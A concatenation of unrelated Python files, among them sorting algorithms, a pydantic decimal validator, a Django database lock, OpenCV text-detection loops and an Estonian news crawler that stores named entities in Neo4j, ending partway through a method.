# name='password_reset'),
# re_path(r'^password_reset/done/$', auth_views.PasswordResetDoneView,
# {'template_name': "users/registration/password_reset_done.html"},
# name='password_reset_done'),
# re_path(r'^reset/(?P<uidb64>[0-9A-Za-z_\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',
# auth_views.PasswordResetConfirmView,
# {'template_name': "users/registration/password_reset_confirm.html"},
# name='password_reset_confirm'),
# re_path(r'^reset/done/$', auth_views.PasswordResetCompleteView,
# {'template_name': "users/registration/password_reset_complete.html"},
# name='password_reset_complete'),
# ] |
from decimal import Decimal
from pydantic import PositiveInt
class Mutation(str):
    """
    Validate a mutation field.
    A mutation field starts with + or - and is followed by a decimal.
    """
    def _get_sign(self):
        """Parse the leading character into a Decimal sign (+1 or -1)."""
        if str(self)[0] == "-":
            return Decimal(-1)
        elif str(self)[0] == "+":
            return Decimal(1)
        raise ValueError("Unknown sign in mutation")
    def _get_number(self):
        """Parse everything after the sign into a Decimal."""
        return Decimal(str(self)[1:])
    def _get_mutation_amount(self):
        """Signed Decimal value of this mutation (sign * magnitude)."""
        return self._get_sign() * self._get_number()
    def validate_transaction(self, start_balance: Decimal, end_balance: Decimal, reference: PositiveInt):
        """Raise ValueError unless start + mutation == end."""
        if start_balance + self._get_mutation_amount() != end_balance:
            raise ValueError(f"Transaction {reference} does not add up")
    @classmethod
    def __get_validators__(cls):
        # pydantic v1 hook: yields the validators run for this type.
        yield cls.validate
    @classmethod
    def __modify_schema__(cls, field_schema):
        # Shown in the generated JSON schema.
        field_schema.update(
            examples=['-1.0', '+1.0', '-1.20'],
        )
    @classmethod
    def validate(cls, v):
        """Check that *v* has the '+/-<decimal>' shape.

        Fixes: an empty string no longer raises IndexError on v[0], and
        the bare ``except:`` is narrowed so it cannot swallow
        KeyboardInterrupt/SystemExit.
        """
        # Guard the empty string before indexing.
        if not v or v[0] not in ["+", "-"]:
            raise TypeError("First character of a mutation must be + or -")
        try:
            Decimal(v[1:])
        except ArithmeticError as err:
            # decimal.InvalidOperation is an ArithmeticError subclass.
            raise TypeError("All other characters must be parsable to a decimal") from err
        return v
    class Config:
        allow_population_by_field_name = True
|
def bubble_sort(nums):
    """
    Sorts a list in place (selection-style exchange sort) and returns it.

    Fixes over the original: the swap uses tuple assignment instead of
    add/subtract arithmetic, which also works for floats and any other
    comparable type; the empty-list guard runs before anything else.
    :param nums: list to sort (mutated in place)
    :return: list
    """
    if not nums:
        return []
    n = len(nums)
    for i in range(n):
        for j in range(i + 1, n):
            # Move the smallest remaining element into position i.
            if nums[i] > nums[j]:
                nums[i], nums[j] = nums[j], nums[i]
    return nums
def merge_sort(nums):
    """
    Sorts a list of numbers using the merge sort algorithm.

    Fix: the midpoint used true division (`/`), which yields a float on
    Python 3 and makes the slice raise TypeError; it now uses floor
    division (`//`).
    :param nums:
    :return: list (a new sorted list)
    """
    if not nums:
        return []
    if len(nums) == 1:
        return nums
    mid = len(nums) // 2
    left = merge_sort(nums[:mid])
    right = merge_sort(nums[mid:])
    return merge(left, right)
def merge(left, right):
    """
    Helper function for merge sort; merges two sorted lists in order.

    Improvement: walks both lists with indices instead of repeated
    ``pop(0)`` (each pop shifts the whole list, making the merge
    quadratic).  The inputs are no longer mutated.
    :param left:
    :param right:
    :return: list
    """
    res = []
    i = j = 0
    while i < len(left) and j < len(right):
        if left[i] <= right[j]:
            res.append(left[i])
            i += 1
        else:
            res.append(right[j])
            j += 1
    # One side is exhausted; append the remainder of the other.
    return res + left[i:] + right[j:]
def quick_sort(nums, left=None, right=None):
    """
    Sorts a list of numbers in place using quick sort and returns it.

    Fix: the pivot index used true division (`/`), which yields a float
    index on Python 3 and raises TypeError; it now uses floor division.
    :param nums:
    :param left: inclusive lower bound (defaults to 0)
    :param right: inclusive upper bound (defaults to len(nums) - 1)
    :return: list
    """
    left = 0 if left is None else left
    right = len(nums) - 1 if right is None else right
    if left >= right:
        return nums
    # Middle element of the current range as pivot.
    pivot = nums[left + (right - left) // 2]
    idx = partition(nums, left, right, pivot)
    quick_sort(nums, left, idx - 1)
    quick_sort(nums, idx, right)
    return nums
def partition(nums, left, right, pivot):
    """
    Helper function for quick sort; rearranges ``nums[left..right]`` so
    values below ``pivot`` end up left of values above it, returning the
    first index of the right-hand region.
    :param nums:
    :param left:
    :param right:
    :param pivot:
    :return: int index
    """
    while left <= right:
        # Skip elements already on the correct side of the pivot.
        while nums[left] < pivot:
            left += 1
        while nums[right] > pivot:
            right -= 1
        if left <= right:
            # Swap the out-of-place pair and advance both cursors.
            nums[left], nums[right] = nums[right], nums[left]
            left += 1
            right -= 1
    return left
|
#!/usr/bin/python3 -d
"""
This file is part of Linspector (https://linspector.org/)
Copyright (c) 2013-2023 Johannes Findeisen <you@hanez.org>. All Rights Reserved.
See LICENSE.
"""
# TODO: Make this a curses style TUI interface for Linspector using urwid or maybe some more modern
# framework like textual. Look at the Lish code for more details about backend implementation and
# the general idea for implementing Linspector clients.
|
import hoi4
import os
import re
import collections
import pyradox
from PIL import Image
def compute_country_tag(filename):
    """Extract the three-letter country tag from a history filename.

    Filenames look like 'GER - Germany.txt': the tag is the run of three
    capital letters before the dash.  Raises AttributeError (None.group)
    when nothing matches, exactly as before.
    """
    match = re.match(r'.*([A-Z]{3})\s*-.*\.txt$', filename)
    return match.group(1)
def compute_color(values):
    """Normalise a country colour triple to an (r, g, b) tuple.

    Integer-first triples are taken to be RGB already; anything else is
    assumed to be HSV and converted via pyradox.
    """
    if not isinstance(values[0], int):
        # hsv
        return pyradox.image.HSVtoRGB(values)
    # rgb
    red, green, blue = values[0], values[1], values[2]
    return (red, green, blue)
# Render a HoI4 map shading each state by its controller's colour; states
# that are a core of their controller get a light tint, others a dark one.
date = pyradox.Date('1936.1.1')
# NOTE(review): `scale` is defined but unused (the resize below is commented out).
scale = 2.0
# state_id -> [tag]
capital_states = {}
country_colors = {}
country_color_file = pyradox.txt.parse_file(os.path.join(pyradox.get_game_directory('HoI4'), 'common', 'countries', 'colors.txt'))
for filename, country in pyradox.txt.parse_dir(os.path.join(pyradox.get_game_directory('HoI4'), 'history', 'countries')):
    tag = compute_country_tag(filename)
    if tag in country_color_file:
        country_colors[tag] = compute_color(tuple(country_color_file[tag].find_all('color')))
    else:
        # Fallback colour for countries missing from colors.txt.
        print('HACK FOR %s' % tag)
        country_colors[tag] = (165, 102, 152)
    print(tag, country_colors[tag])
    if country['capital'] not in capital_states: capital_states[country['capital']] = []
    capital_states[country['capital']].append(tag)
# Load states.
states = pyradox.txt.parse_merge(os.path.join(pyradox.get_game_directory('HoI4'), 'history', 'states'))
province_map = pyradox.worldmap.ProvinceMap(game = 'HoI4')
# provinces -> state id
colormap = {}
textcolormap = {}
groups = {}
for state in states.values():
    # Key each state by its tuple of land provinces; used for edge drawing
    # and for placing the state-id label.
    k = tuple(province_id for province_id in state.find_all('provinces') if not province_map.is_water_province(province_id))
    groups[k] = str(state['id'])
    history = state['history'].at_time(date)
    controller = history['controller'] or history['owner']
    controller_color = country_colors[controller]
    if controller in history.find_all('add_core_of'):
        # Cored: pale tint of the controller colour, black label.
        color = tuple(x // 4 + 191 for x in controller_color)
        textcolormap[k] = (0, 0, 0)
    else:
        # Not cored: dark shade of the controller colour, white label.
        color = tuple(x // 4 for x in controller_color)
        textcolormap[k] = (255, 255, 255)
    # color the province
    for province_id in state.find_all('provinces'):
        if not province_map.is_water_province(province_id):
            colormap[province_id] = color
out = province_map.generate_image(colormap, default_land_color=(255, 255, 255), edge_color=(127, 127, 127), edge_groups = groups.keys())
# out = out.resize((out.size[0] * scale, out.size[1] * scale), Image.NEAREST)
# unfortunately lakes don't have unitstacks.txt
province_map.overlay_text(out, groups, colormap = textcolormap, fontfile = "tahoma.ttf", fontsize = 9, antialias = False)
out.save('out/add_core_of_map.png')
#pyradox.image.save_using_palette(out, 'out/province__id_map.png')
|
from django.db import connection
from django.db import models
class Lock(models.Model):
    """Database-backed advisory lock usable as a context manager.

    Entering the context ensures a row for ``key`` exists, then takes a
    ``SELECT ... FOR UPDATE`` row lock on it; exiting commits, releasing
    the lock. Requires a backend with row locking (e.g. MySQL/InnoDB).
    """
    key = models.CharField(primary_key=True, max_length=25, unique=True)

    def __enter__(self):
        self.cursor = connection.cursor()
        # The table name comes from trusted model metadata; the key value is
        # parameterized so user-supplied keys cannot inject SQL.
        table = self._meta.db_table
        self.cursor.execute(
            "SELECT count(*) FROM {} WHERE `key`=%s".format(table), [self.key])
        if not self.cursor.fetchone()[0]:
            # Create the lock row outside the locking transaction so a
            # concurrent creator does not deadlock us.
            self.cursor.execute(
                "REPLACE INTO {} (`key`) values(%s)".format(table), [self.key])
            self.cursor.execute("COMMIT")
        self.cursor.execute("BEGIN")
        # Blocks here until any other holder of this key commits.
        self.cursor.execute(
            "SELECT * FROM {} WHERE `key`=%s FOR UPDATE".format(table),
            [self.key])
        return self

    def __exit__(self, type, value, traceback):
        # COMMIT releases the row lock even if the body raised.
        self.cursor.execute("COMMIT")
        self.cursor.close()
"""
Usage:
with Lock(key=key):
# do stuff
"""
|
from google.appengine.ext import db
class FlashImage(db.Model):
    """Datastore entity for an uploaded image served from /fupload/."""
    url = '/fupload/'
    uploaded_data = db.BlobProperty()
    date = db.DateTimeProperty(auto_now_add=True)
    comment = db.TextProperty()
    title = db.StringProperty()
    filename = db.StringProperty(default = "uploaded_image.png")

    def __unicode__(self):
        # Display the stored filename for this entity.
        return str(self.filename)

    def get_embed(self):
        """Return an <img> snippet that inlines this image by datastore key."""
        return u"<img src='/fupload/%s' />" % (self.key())

    def get_link(self):
        """Return an <a> snippet linking to this image, labelled with its filename."""
        return u"<a href='/fupload/%s'>%s</a>" % (self.key(), self.filename)

    def deletable(self):
        """Images are never deletable through the admin UI."""
        return False
|
class Solution(object):
    def isAnagram(self, s, t):
        """Return True when t is an anagram of s (same characters, same counts).

        :type s: str
        :type t: str
        :rtype: bool

        Fixes: the original crashed with TypeError on isAnagram(None, None)
        (the XOR-style None check let both-None fall through to len(None)).
        Also builds a single histogram instead of two full dicts.
        """
        if s is None or t is None:
            # Two missing strings are considered anagrams of each other;
            # a missing string is never an anagram of a real one.
            return s is t
        if len(s) != len(t):
            return False
        # Count characters of s, then consume them with t; any miss or
        # over-consumption means the multisets differ.
        counts = {}
        for ch in s:
            counts[ch] = counts.get(ch, 0) + 1
        for ch in t:
            if ch not in counts:
                return False
            counts[ch] -= 1
            if counts[ch] < 0:
                return False
        return True
def binarySearch(left, right, arr, searchKey, ans):
    """Record in ans[0] the smallest element of arr[left:right+1] that is
    strictly greater than searchKey; ans is left untouched when no such
    element exists. arr must be sorted ascending. Always returns None.
    """
    # Iterative form of the original recursion: shrink [left, right] while
    # remembering the best (smallest) candidate seen so far.
    while left <= right:
        mid = (left + right) // 2
        if arr[mid] > searchKey:
            # Candidate found; keep looking left for a smaller one.
            ans[0] = arr[mid]
            right = mid - 1
        else:
            # arr[mid] <= searchKey: the answer must lie to the right.
            left = mid + 1
def findNext(arr, char):
    """Return the smallest element of sorted arr strictly greater than char,
    wrapping around to arr[0] when every element is <= char.
    """
    # Binary search inlined here (same algorithm the helper implemented):
    # the default answer arr[0] realises the wrap-around behaviour.
    lo, hi = 0, len(arr) - 1
    result = arr[0]
    while lo <= hi:
        mid = (lo + hi) // 2
        if arr[mid] > char:
            result = arr[mid]
            hi = mid - 1
        else:
            lo = mid + 1
    return result
# Demo: smallest letter strictly greater than the target (wraps to arr[0]).
arr1, char1 = ["c", "f", "j"], "a"
arr2, char2 = ["e"] * 6 + ["n"] * 4, "e"
for letters, target in ((arr1, char1), (arr2, char2)):
    print(findNext(letters, target))
|
import cv2
import numpy as np
# Live preview of the default camera; press 'q' to quit.
cam = cv2.VideoCapture(0)
while True:
    ret, im = cam.read()
    if not ret:
        # Camera unavailable or stream ended: stop instead of passing
        # None to imshow (the original crashed here).
        break
    cv2.imshow('im', im)
    if cv2.waitKey(10) == ord('q'):
        break
cam.release()
cv2.destroyAllWindows()
import numpy as np
import cv2 as cv
def text_detection_MSER(img):
    """Detect MSER regions (text candidates) in img and display two overlays:
    the regions painted over the input ("canvas_TextRec") and the regions
    alone on black ("canvas_tx"). Display-only; returns nothing.
    """
    ## Read image and change the color space
    im_shape = img.shape
    if len(im_shape) == 2:
        # Grayscale input: expand to 3 channels so region coloring works.
        img = cv.cvtColor(img, cv.COLOR_GRAY2RGB)
    gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
    ## Get mser, and set parameters
    mser = cv.MSER_create()
    # mser.setMinArea(100)
    # mser.setMaxArea(750)
    ## Do mser detection, get the coodinates and bboxes
    coordinates, bboxes = mser.detectRegions(gray)
    ## colors
    # Fixed 30-color palette used to distinguish neighbouring regions.
    colors = [[43, 43, 200], [43, 75, 200], [43, 106, 200], [43, 137, 200], [43, 169, 200], [43, 200, 195],
              [43, 200, 163], [43, 200, 132], [43, 200, 101], [43, 200, 69], [54, 200, 43], [85, 200, 43],
              [116, 200, 43], [148, 200, 43], [179, 200, 43], [200, 184, 43], [200, 153, 43], [200, 122, 43],
              [200, 90, 43], [200, 59, 43], [200, 43, 64], [200, 43, 95], [200, 43, 127], [200, 43, 158],
              [200, 43, 190], [174, 43, 200], [142, 43, 200], [111, 43, 200], [80, 43, 200], [43, 43, 200]]
    ## Fill with random colors
    # Fixed seed makes the color assignment reproducible across frames.
    np.random.seed(0)
    canvas1 = img.copy()
    canvas3 = np.zeros_like(img)
    for cnt in coordinates:
        # cnt is an (N, 2) array of x,y pixel coordinates for one region.
        xx = cnt[:, 0]
        yy = cnt[:, 1]
        color = colors[np.random.choice(len(colors))]
        canvas1[yy, xx] = color
        canvas3[yy, xx] = color
    # cv2.imshow('result',canvas3)
    cv.imshow("canvas_TextRec", canvas1)
    cv.imshow("canvas_tx", canvas3)
# Run MSER text detection over every frame of the test video (Esc quits).
mser = cv.MSER_create()
cap = cv.VideoCapture('videos/test.mp4')
fgbg = cv.bgsegm.createBackgroundSubtractorMOG()
while(1):
    ret, frame = cap.read()
    if not ret:
        # End of video or read failure: stop instead of crashing in
        # cvtColor on a None frame (the original did not check ret).
        break
    gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
    # Histogram equalization boosts contrast before region detection.
    gray = cv.equalizeHist(gray)
    text_detection_MSER(gray)
    k = cv.waitKey(10) & 0xff
    if k == 27:
        break
cap.release()
cv.destroyAllWindows()
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os.path, json
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
from bs4 import BeautifulSoup
from estnltk import Text
from py2neo import Graph
from py2neo.ogm import GraphObject, Property, RelatedTo, RelatedFrom
from hashlib import md5
import re
import time, datetime
import logging
class Nstory(GraphObject):
    """py2neo OGM node for one news story, keyed by URL.

    Keeps local dict caches of its sentences and words so repeated inserts
    during text analysis avoid round-trips to the graph database.
    """
    __primarykey__ = "url"
    url = Property()
    title = Property()
    category = Property()
    hash = Property()
    pub_day_sec = Property("pubDaySec") #int
    ver = Property()
    sentences = RelatedTo("Sentence", "HAS")
    editors = RelatedTo("Editor", "EDITED_BY")
    def __init__(self):
        # Local caches: sentence number -> Sentence, and
        # word type -> word text -> LocalWord.
        self.sentences_dict = {}
        self.words_dict = {}
    def pullLocalGraph(self, graph, pullNstory=True, resetWordCount=False):
        """Fill the local caches from the graph; optionally zero the
        per-sentence word counts (used before re-analyzing a story)."""
        if (pullNstory): graph.pull(self)
        for sen in self.sentences:
            self.sentences_dict[sen.num] = sen
            for word in sen.words:
                if (word.type not in self.words_dict):
                    self.words_dict[word.type] = {}
                self.words_dict[word.type][word.text] = word
                if (resetWordCount):
                    props = {}
                    props['count'] = 0
                    sen.words.update(word, props)
    def pushLocalGraph(self, graph):
        """Push every cached sentence (with its words) and then the story
        itself; sanity-check that no cached sentence was lost."""
        for sen in self.sentences_dict.values():
            if (sen not in self.sentences):
                self.sentences.add(sen)
            logging.info("Pushing sentence: %d with %d words. " % (sen.num, len(sen.words) ) )
            graph.push(sen)
        logging.info("Pushing nstory")
        graph.push(self)
        if ( len(self.sentences) != len(self.sentences_dict) ):
            raise AssertionError('Sentence counts dont match for url: %s' % (self.url) )
    def attachTimetree(self, graph, pub_date_time, pub_timezone):
        """Attach this story to the GraphAware timetree at its publication
        moment. pub_date_time must be 'YYYY-MM-DD HH:MM:SS'.

        If a publication day is already attached: an older one is detached
        (and the method returns without re-attaching — NOTE(review): that
        leaves the story dateless until the next run); a newer one is an
        error; an equal one is a no-op.
        """
        if ( pub_date_time.find(' ') > 0 ):
            prev_date = self.getPubDate(graph)
            pub_date = pub_date_time.split(' ')[0]
            if (prev_date):
                if (prev_date < pub_date):
                    graph.run(
                        "MATCH (ns:Nstory {url: {inUrl}})-[rel]->(:Day) "
                        "WITH rel LIMIT 1 "
                        "DELETE rel ",
                        {'inUrl': self.url}
                    )
                elif(prev_date > pub_date):
                    raise AssertionError("Previous pub_date is bigger than new pub_date, url %s" % (self.url))
                return
            # Milliseconds since epoch, as the timetree plugin expects.
            pub_timestamp = int(time.mktime(datetime.datetime.strptime(pub_date_time, "%Y-%m-%d %H:%M:%S").timetuple()))*1000
            graph.run(
                "MATCH (ns:Nstory {url: {inUrl}}) "
                "CALL ga.timetree.events.attach({node: ns, time: {inTimestamp}, timezone: '{inTz}', relationshipType: 'PUBLISHED_ON'}) "
                "YIELD node RETURN node ",
                {'inUrl': self.url, 'inTimestamp': pub_timestamp, 'inTz': pub_timezone}
            )
    def getPubDate(self, graph):
        """Return the attached publication date as 'YYYY-MM-DD', or None."""
        results = graph.data(
            "MATCH (n:Nstory {url: {inUrl} })-->(d:Day)<--(m:Month)<--(y:Year) "
            "RETURN d.value, m.value, y.value "
            "LIMIT 1 "
            , {'inUrl': self.url}
        )
        if (len(results) > 0):
            date_str = "%d-%02d-%02d" % (results[0]['y.value'], results[0]['m.value'], results[0]['d.value'])
            return date_str
        else:
            return None
    def insertSentence(self, graph, sentence_num):
        """Create and cache a Sentence node for sentence_num if absent.
        Returns the new Sentence, or None when it already existed."""
        if (not sentence_num in self.sentences_dict):
            new_sentence = Sentence()
            new_sentence.num = sentence_num
            ##ogm class can't create temp id-s, with merge it gets internal ID from db
            graph.merge(new_sentence)
            self.sentences_dict[sentence_num] = new_sentence
            return new_sentence
        return None
    def insertWord(self, graph, sen_num, w_text, w_type, w_orig_text):
        """Attach word w_text/w_type to the cached sentence sen_num,
        creating the LocalWord if needed and bumping its per-sentence
        'count'. Raises ValueError when the sentence is not cached."""
        created_newword = False
        if (sen_num in self.sentences_dict):
            sentence = self.sentences_dict[sen_num]
            if (w_type in self.words_dict and w_text in self.words_dict[w_type]):
                word = self.words_dict[w_type][w_text]
            else:
                word = LocalWord()
                if (w_type not in self.words_dict):
                    self.words_dict[w_type] = {}
                self.words_dict[w_type][w_text] = word
                created_newword = True
            word.text = w_text
            word.type = w_type
            # Ambiguous lemmas like "Ossinovsk|Ossinovski" keep the
            # original surface text alongside.
            if (w_text.find('|') > 0):
                word.origtext = w_orig_text
            if (created_newword):
                ##ogm class can't create temp id-s, with merge it gets internal ID from db
                graph.merge(word)
            props = {}
            props['count'] = sentence.words.get(word, 'count',0) + 1
            logging.info("sen: %d -> %s|%s" % (sen_num, word.text, word.type))
            sentence.words.update(word, props)
            return word
        else:
            raise ValueError('Sentence object doesnt exist.')
        # NOTE(review): unreachable — the raise above always exits first.
        return None
class Sentence(GraphObject):
    """One sentence of a story; links the story to its recognized words."""
    num = Property("numInNstory") #int
    in_nstories = RelatedFrom("Nstory", "HAS")
    words = RelatedTo("LocalWord", "HAS")
class LocalWord(GraphObject):
    """A named entity occurrence local to one story's sentences."""
    text = Property()
    type = Property() #values: 'LOC', 'ORG', 'PER'
    origtext = Property()
    in_sentences = RelatedFrom("Sentence", "HAS")
    terms = RelatedTo("Term", "IS")
class Term(GraphObject):
    """Canonical entity shared across stories; id is 'text|type'."""
    __primarykey__ = "id"
    text = Property()
    type = Property() #values: 'LOC', 'ORG', 'PER'
    fuzzy = Property() #values: "true"
    incoming = Property() #int
    in_words = RelatedFrom("LocalWord", "IS")
class Editor(GraphObject):
    """A person credited as editor of one or more stories."""
    __primarykey__ = "name"
    name = Property()
    in_nstories = RelatedFrom("Nstory", "EDITED_BY")
class UudisKratt():
    """Crawler that fetches Estonian news articles, extracts named entities
    with estnltk, and stores stories/sentences/words/terms in Neo4j.

    Fixes over the original:
    - analyzeText's over-length error branch referenced the undefined name
      ``article_url`` (NameError); it now reports ``nstory.url``.
    - fetchArticle no longer crashes with ``len(None)`` when the editor
      paragraph lacks a ``span.name`` element.
    """
    VERSION = "4"
    MAX_TEXT_LEN = 110000
    MAX_FIELD_LEN = 150
    LOCK_FILE = "graph-err.lock"
    def __init__(self):
        # Minimum delay between HTTP requests, to be polite to the site.
        self.throttle_delay = 8 # sec
        self.last_request_time = None
        # Neo4j credentials come from ~/.graph-err.cnf (JSON).
        homedir = os.path.expanduser('~')
        confFile = os.path.join(homedir, '.graph-err.cnf')
        with open(confFile) as json_data_file:
            my_conf = json.load(json_data_file)
        self.graph = Graph(user=my_conf['neo4j']['user'], password=my_conf['neo4j']['password'])
    def fetchArticle(self, article_url):
        """Download one article, parse its metadata/body/editors, persist the
        Nstory and run entity analysis. Returns True on success, False on a
        malformed page; HTTP errors mark the node as ErrorNstory."""
        out_text = ''
        if (article_url):
            # Throttle: sleep if the previous request was too recent.
            current_time = time.time()
            if (self.last_request_time and
                (current_time - self.last_request_time < self.throttle_delay)):
                throttle_time = (self.throttle_delay -
                    (current_time - self.last_request_time))
                logging.info("sleeping for %f seconds" % (throttle_time))
                time.sleep(throttle_time)
            self.last_request_time = time.time()
            req = Request(article_url)
            try:
                response = urlopen(req)
            except HTTPError as e:
                self.setErrorNstory(article_url)
                logging.error('HTTPError: %d, setting ErrorNstory' % (e.code) )
            except URLError as e:
                logging.error('URLError: %s' % (e.reason) )
            else:
                # Follow redirects: keep the canonical URL in the graph.
                req_url = response.geturl()
                if (req_url != article_url):
                    self.updateNstoryUrl(article_url, req_url)
                    article_url = req_url
                nstory = Nstory()
                nstory.url = article_url
                html_data = response.read()
                soup = BeautifulSoup(html_data, "lxml")
                cat_match = soup.find("meta", property="article:section")
                if (cat_match):
                    nstory.category = cat_match["content"][:UudisKratt.MAX_FIELD_LEN]
                nstory.ver = UudisKratt.VERSION
                pub_date = ''
                pub_timezone = ''
                ##<meta property="article:modified_time" content="2016-12-14T10:49:25+02:00" />
                mod_date = soup.find("meta", property="article:modified_time")
                if (mod_date):
                    match_date = re.search("^(\d+-\d+-\d+)T(\d+:\d+:\d+)\+(\d+:\d+)", mod_date["content"])
                    if match_date:
                        nstory.pub_day_sec = self.getSec(match_date.group(2))
                        pub_date = "%s %s" % (match_date.group(1), match_date.group(2))
                        pub_timezone = "GMT+%s" % (match_date.group(3) )
                #title
                m_title = soup.find("meta", property="og:title")
                if (m_title):
                    nstory.title = m_title["content"][:UudisKratt.MAX_FIELD_LEN]
                art_text = soup.find("article")
                if (art_text and pub_date and pub_timezone):
                    # Turn <br> into sentence-ish separators, then join the
                    # plain (class-less) paragraphs into one text blob.
                    for html_break in art_text.find_all('br'):
                        html_break.replace_with('; ')
                    for row in art_text.find_all("p", {'class': None}):
                        row_text = row.get_text(separator=u' ')
                        out_text = "%s %s" % (out_text, row_text)
                    logging.info("Updating Nstory: %s" % (article_url) )
                    self.graph.merge(nstory)
                    nstory.attachTimetree(self.graph, pub_date, pub_timezone)
                    editor_txt = art_text.find("p", {'class': 'editor'})
                    if (editor_txt):
                        editor_txt = editor_txt.find("span", {'class': 'name'})
                        # find() may return None when the span is missing;
                        # the original called len(None) here and crashed.
                        if (editor_txt is not None and len(editor_txt) > 0):
                            for editor_str in editor_txt.text.split(','):
                                editor = Editor()
                                editor.name = editor_str.strip()[:UudisKratt.MAX_FIELD_LEN]
                                nstory.editors.add(editor)
                    retval = self.analyzeText(out_text, nstory)
                    return retval
                else:
                    logging.error("Malformed content at url, setting as ErrorNstory: %s" % (article_url))
                    self.setErrorNstory(article_url)
        return False
    def texthash(self, text):
        """MD5 hex digest of the article text (change detection)."""
        return md5(text.encode('utf-8')).hexdigest()
    def getSec(self, time_str):
        """Convert 'HH:MM:SS' to seconds since midnight."""
        h, m, s = time_str.split(':')
        return int(h) * 3600 + int(m) * 60 + int(s)
    def analyzeText(self, in_text, nstory):
        """Run named-entity extraction over in_text and store each entity as
        a word attached to its sentence. Returns True on success."""
        if (len(in_text) < UudisKratt.MAX_TEXT_LEN ):
            pullNstory = False
            resetWordCount = True
            nstory.pullLocalGraph(self.graph, pullNstory, resetWordCount)
            text = Text(in_text)
            sentence_count = 0
            count = 0
            prev_sen_num = -1
            logging.info("%s named entities: %d " % (nstory.url, len(text.named_entities) ) )
            for named_entity in text.named_entities:
                # Re-case the lemmatized entity to match the original
                # surface text (all-caps, inner caps, or title case).
                ne_words = named_entity.split()
                orig_words = text.named_entity_texts[count].split()
                orig_text = text.named_entity_texts[count]
                word_count = 0
                out_entity = u''
                for ne_word in ne_words:
                    if (word_count > len(orig_words)-1 ):
                        break
                    if (word_count):
                        out_entity = "%s " % (out_entity)
                    #last word
                    if (word_count == (len( ne_words )-1) ):
                        new_word = ne_word
                        if ( orig_words[word_count].isupper() ):
                            new_word = new_word.upper()
                        elif ( len(orig_words[word_count])>1 and orig_words[word_count][1].isupper() ):
                            new_word = new_word.upper()
                        elif ( orig_words[word_count][0].isupper() ):
                            new_word = new_word.title()
                        #Jevgeni Ossinovsk|Ossinovski
                        if (out_entity and new_word.find('|') > 0 ):
                            # Expand "First Last1|Last2" into
                            # "First Last1|First Last2".
                            word_start = out_entity
                            out_ent2 = ''
                            for word_part in new_word.split('|'):
                                if (out_ent2):
                                    out_ent2 = "%s|" % (out_ent2)
                                out_ent2 = "%s%s%s" % (out_ent2, word_start, word_part)
                            out_entity = out_ent2
                        else:
                            out_entity = "%s%s" % (out_entity, new_word)
                    else:
                        out_entity = "%s%s" % (out_entity, orig_words[word_count])
                    word_count += 1
                # Advance to the sentence containing this entity's end.
                ne_endpos = text.named_entity_spans[count][1]
                while (ne_endpos > text.sentence_ends[sentence_count]):
                    sentence_count += 1
                ## Rupert Colville'i
                ## Birsbane’is
                # Strip Estonian case endings attached with an apostrophe.
                if ( out_entity.find("'") > 0 or out_entity.find("’") > 0 ):
                    out_entity = re.sub(u"^(.+?)[\'\’]\w{1,2}$", u"\\1", out_entity)
                w_type = text.named_entity_labels[count]
                if (sentence_count != prev_sen_num):
                    nstory.insertSentence(self.graph, sentence_count)
                    prev_sen_num = sentence_count
                nstory.insertWord(self.graph, sentence_count, out_entity, w_type, orig_text)
                count += 1
            nstory.hash = self.texthash(in_text)
            nstory.pushLocalGraph(self.graph)
            return True
        else:
            # BUG FIX: the original referenced the undefined name
            # 'article_url' here, raising NameError instead of logging.
            logging.error("text size exceeds limit! url: %s" % (nstory.url) )
            return False
    def getNstory(self, url):
        """Return the Nstory OGM object for url, or None."""
        return Nstory.select(self.graph, url).first()
    def genTerms(self, url):
        """Create/link canonical Terms for every word of a story, resolving
        surnames and ambiguous 'a|b' person names against co-occurring full
        names. Returns the set of term ids touched."""
        added_terms = set()
        results = self.graph.data(
            "MATCH (nstory:Nstory {url: {inUrl} })--(sentence:Sentence)--(word:LocalWord) "
            "RETURN DISTINCT word.text as text, word.type as type, id(word) as id "
            "ORDER BY type "
            , {'inUrl': url}
        )
        persons = []
        for wordDict in results:
            if (wordDict['type'] == 'LOC' or wordDict['type'] == 'ORG'):
                added_terms.add( self.insertTerm(wordDict['text'], wordDict['type'], wordDict['id']) )
            elif (wordDict['type'] == 'PER'):
                if (wordDict['text'].find(' ') > 0):
                    wordDict['surname'] = wordDict['text'].split(' ')[-1]
                else:
                    wordDict['surname'] = ''
                persons.append(wordDict)
            else:
                logging.error("unknown LocalWord type: %s, word id(): %d " % (wordDict['type'], wordDict['id']))
        for person in persons:
            if (person['text'].find(' ') > 0):
                if (person['text'].find('|') > 0):
                    # Ambiguous full name: prefer the variant that also
                    # appears on its own in this story.
                    useName = person['text']
                    for fullname in person['text'].split('|'):
                        match = next((item for item in persons if item["text"] == fullname), None)
                        if (match) :
                            useName = fullname
                            person['surname'] = fullname.split(' ')[-1]
                            break
                    added_terms.add( self.insertTerm(useName, person['type'], person['id']) )
                else:
                    added_terms.add( self.insertTerm(person['text'], person['type'], person['id']) )
            else:
                #lookup if short name is surname
                if (person['text'].find('|') > 0):
                    useName = person['text']
                    for name in person['text'].split('|'):
                        match = next((item for item in persons if item["surname"] == name), None)
                        if (match) :
                            useName = match['text']
                            break
                    added_terms.add( self.insertTerm(useName, person['type'], person['id']) )
                else:
                    useName = person['text']
                    match = next((item for item in persons if item["surname"] == person['text']), None)
                    if (match) :
                        useName = match['text']
                    added_terms.add( self.insertTerm(useName, person['type'], person['id']) )
        return added_terms
    def checkForLocalWords(self, url):
        """Re-fetch the article when its graph data is incomplete (no
        sentences, or a sentence with no words)."""
        newsNode = self.graph.find_one('Nstory', property_key='url', property_value=url)
        sen_count = 0
        for rel in self.graph.match(start_node=newsNode, rel_type="HAS"):
            sentence = rel.end_node()
            sen_count += 1
            sWordRels = self.graph.match(start_node=sentence, rel_type="HAS")
            if (next(sWordRels, None) == None):
                logging.info("dead end sentence [%d] for url: %s ...fetching article" % (sentence['numInNstory'], url))
                self.delDeadEndSentences(url)
                self.fetchArticle(url)
                return
        if (sen_count == 0):
            logging.info("no sentences for url: %s ...fetching article" % (url, ))
            self.fetchArticle(url)
            return
    def insertTerm(self, w_text, w_type, w_id):
        """MERGE a Term for w_text/w_type (marking ambiguous '|' names as
        fuzzy) and link the LocalWord w_id to it. Returns the term id."""
